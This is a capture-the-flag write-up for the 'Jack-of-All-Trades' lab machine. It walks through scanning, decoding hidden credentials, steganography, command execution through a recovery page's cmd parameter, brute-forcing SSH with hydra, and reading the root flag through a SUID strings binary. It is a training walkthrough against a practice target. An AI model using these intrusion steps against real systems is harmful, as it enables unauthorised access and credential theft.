# Jack-of-All-Trades ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuBhC1p4kMOhz-hILJ%2F-McuBraVpZmSim70sH5H%2Fimage.png?alt=media\&token=d1c6154a-2ada-4480-9054-b37b984ea21f) ## Scanning Lets run nmap scans to find open ports and services. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuC0_V42oDeS-PT6ci%2F-McuDHl7IeDl9lvSMlq2%2Fimage.png?alt=media\&token=474a5938-603e-40ba-8a13-3bc773199cde) ## Enumeration Lets visit the website on port 22 ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuC0_V42oDeS-PT6ci%2F-McuE8qiMG41P092tJEu%2Fimage.png?alt=media\&token=c3e07fef-9830-45ff-9832-64355cf6e97b) We have to bypass this and we can do this by going to `about:config` and search for `network.security.ports.banned.override` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuC0_V42oDeS-PT6ci%2F-McuEXzcDjj8KNZr4mKg%2Fimage.png?alt=media\&token=53296e3f-4b38-45a2-adf7-f747108f0fd7) Now delete the current one and add another with the String option and type in port 22 ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuC0_V42oDeS-PT6ci%2F-McuF7aFDPObhhN8mPZT%2Fimage.png?alt=media\&token=81233c90-5f92-4b15-a95b-b8722c73cc0a) Now lets visit the site on port 22 again ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuC0_V42oDeS-PT6ci%2F-McuFMrsYxOjx6NeBdk4%2Fimage.png?alt=media\&token=f473628d-1635-4b2d-aecf-1cd6e89e4267) We have a web page. We also have a username `Jack`. Lets run a gobuster scan while we explore the webpage. ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.182.211:22/ ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuNciGJGIm2lMZ-Unt%2Fimage.png?alt=media\&token=83028923-f751-4abe-bc7e-982fbb94afe9) We get nothing of interest Lets look at the source code ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuFqQQoMUZPxKa8K20%2Fimage.png?alt=media\&token=36f4e380-38b9-426f-94aa-f3df5db899db) Ok so we have a web page called `/recovery.php` and a string , lets decode the string using [CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Base64\('A-Za-z0-9%2B/%3D',true\)\&input=VW1WdFpXMWlaWElnZEc4Z2QybHphQ0JLYjJodWVTQkhjbUYyWlhNZ2QyVnNiQ0IzYVhSb0lHaHBjeUJqY25sd2RHOGdhbTlpYUhWdWRHbHVaeUVnU0dseklHVnVZMjlrYVc1bklITjVjM1JsYlhNZ1lYSmxJR0Z0WVhwcGJtY2hJRUZzYzI4Z1oyOTBkR0VnY21WdFpXMWlaWElnZVc5MWNpQndZWE56ZDI5eVpEb2dkVDlYZEV0VGNtRnhDZw) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuG3TNPnkNFwqias8Y%2Fimage.png?alt=media\&token=20377dd2-445d-4cb0-b30e-a94e599c5b89) Looks like we have a password and someone called `Johny Graves`, lets go check on google who this guy is. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuHt_J12k2e9awJEIk%2Fimage.png?alt=media\&token=cdd5a9c2-05f2-45a5-a789-21659f1e9f9f) Found his twitter and an interesting post about his favorite `crypto` method. Lets now look at the recovery page we found. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuINCIgjM7gEQm5Uki%2Fimage.png?alt=media\&token=b8987aa2-22e4-4713-8d93-3df56cd7dd7c) Its a password recovery tool, lets look at the source code. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuIY4Ojzxloy9_BrZt%2Fimage.png?alt=media\&token=d684c4f6-cab1-4eed-9648-d6004cbae995) We have another string, lets try using the method we found in the Twitter post ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuJ7Cngr1VDweF4kbx%2Fimage.png?alt=media\&token=c121b81c-051c-4f58-a679-4624e4e880fa) Lets visit the bit.ly link ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuJL0kE9mrZltgQYb6%2Fimage.png?alt=media\&token=a14c9ff6-2218-460f-bc6b-80132c13556a) Its a dinosaur page, lets go to the home as there is his password there. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuJV9nn9ow6UOZWHrr%2Fimage.png?alt=media\&token=b5a947e1-a7f0-4d2c-8b22-165b2cd5e252) We have the same dinosaur, his password might be hidden in this , lets use `steganography` to find hidden information in this image, lets first download the image to our machine. Looking at the source , we can find the link to the image ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuJoftpP-S7skAI3q-%2Fimage.png?alt=media\&token=77b07ae7-ffca-4047-9259-85f000e89e40) Lets download the image ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuJuTvQ5LNZ8wKBSO4%2Fimage.png?alt=media\&token=9f26ee99-1c49-43f2-a821-9e6c8ebfdcfc) Lets use `steghide` to find hidden files, its asks for a password, we can use the one we found when we decoded the first string. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuKNEwALiHiSb1Ejtj%2Fimage.png?alt=media\&token=d07de27f-6c1f-4f92-93f4-d13734d95aa8) Lets read this file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuKSG-BEC0pxToAQ5m%2Fimage.png?alt=media\&token=e3547931-8609-46f3-ab0b-3b25495330ed) Damn, lets download the other image ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuKehLOkXtuyG59NyP%2Fimage.png?alt=media\&token=2641166c-c86f-4558-b16f-d820f4aac96b) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuKnNlPE-Ucnbw0tmS%2F-McuKq3G4ck_Gff0D3a2%2Fimage.png?alt=media\&token=ce54cc83-e1f4-46f8-9a7c-4d120ff0fee4) We have another file, lets check it out ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuKnNlPE-Ucnbw0tmS%2F-McuL-o6eTKv_EKmo3Mi%2Fimage.png?alt=media\&token=820f64f3-838c-4095-816b-859937462ecb) We have the username and the password, lets login in the recovery page. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuKnNlPE-Ucnbw0tmS%2F-McuLbi1nqQhGean-MbO%2Fimage.png?alt=media\&token=58967dc7-af0e-442f-97d6-8a268bd4d83f) ## Exploitation Lets run a command using the cmd parameter ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuLrign6VHUaraVjo5%2Fimage.png?alt=media\&token=5b148bc1-ecc4-4508-b117-fdbfe2cbd3bd) So our commands are working, we have Remote Code Execution on the machine, lets navigate through the machine and look for interesting files ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuMFqUgFT4Rx6eDIcW%2Fimage.png?alt=media\&token=dc6ebd85-c215-413b-9fcf-3593d451eaa5) We have an interesting file, lets read it ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuMYDQznVHdrXL0dj1%2Fimage.png?alt=media\&token=172200bf-6cdc-4910-b344-ce81d1914fdd) Its a list of passwords, lets copy them onto our machine and name the file `passwords.txt.` One of these might be Jack's password, lets use `hydra` to get the right password for logging into ssh First lets save the passwords ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuMzoy-o4Dw6eLHULr%2Fimage.png?alt=media\&token=fa8be12b-1cfb-4f64-a7d5-8855bd4405ca) Now lets use hydra. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuNDpFjiqh5GtJ-fuF%2Fimage.png?alt=media\&token=dbc4e133-1f4b-403d-b8b6-6d6255bf730f) We have the password, lets login through ssh. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuOJghrCdCsQjnf6AA%2Fimage.png?alt=media\&token=de85cf6c-7ff7-4ca0-b1cd-40147da68124) Lets download this image to our machine ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuOP6vJDqxBlBkv2ho%2Fimage.png?alt=media\&token=51e41140-89e8-4050-8373-40fda3842028) Lets open the file and see what it says ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuOiHlw_D3zfazrXD_%2Fimage.png?alt=media\&token=b685b00a-48d6-4e19-951c-f66dcb31ceb5) We have the user flag ## Privilege Escalation We do not have sudo permissions so lets look at the `SUID` files ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuPDGCr4I6Odet86nY%2Fimage.png?alt=media\&token=d011b55e-2332-44f7-9c7b-9af0c51f87cf) `/usr/bin/strings` is interesting Lets get more information about this on [GTFOBins ](https://gtfobins.github.io/gtfobins/strings/#suid). ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuPV6ZIvZdA1oeJJ_m%2Fimage.png?alt=media\&token=c53ad66a-81b9-4214-83db-2699328744c8) Looks like we can run the strings command on any file we want, so lets run it on the root/root.txt file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuPnFDXEcu8PhREH2e%2Fimage.png?alt=media\&token=f94af99e-736c-4559-81bc-c1fdb73bffbc) We have the root flag.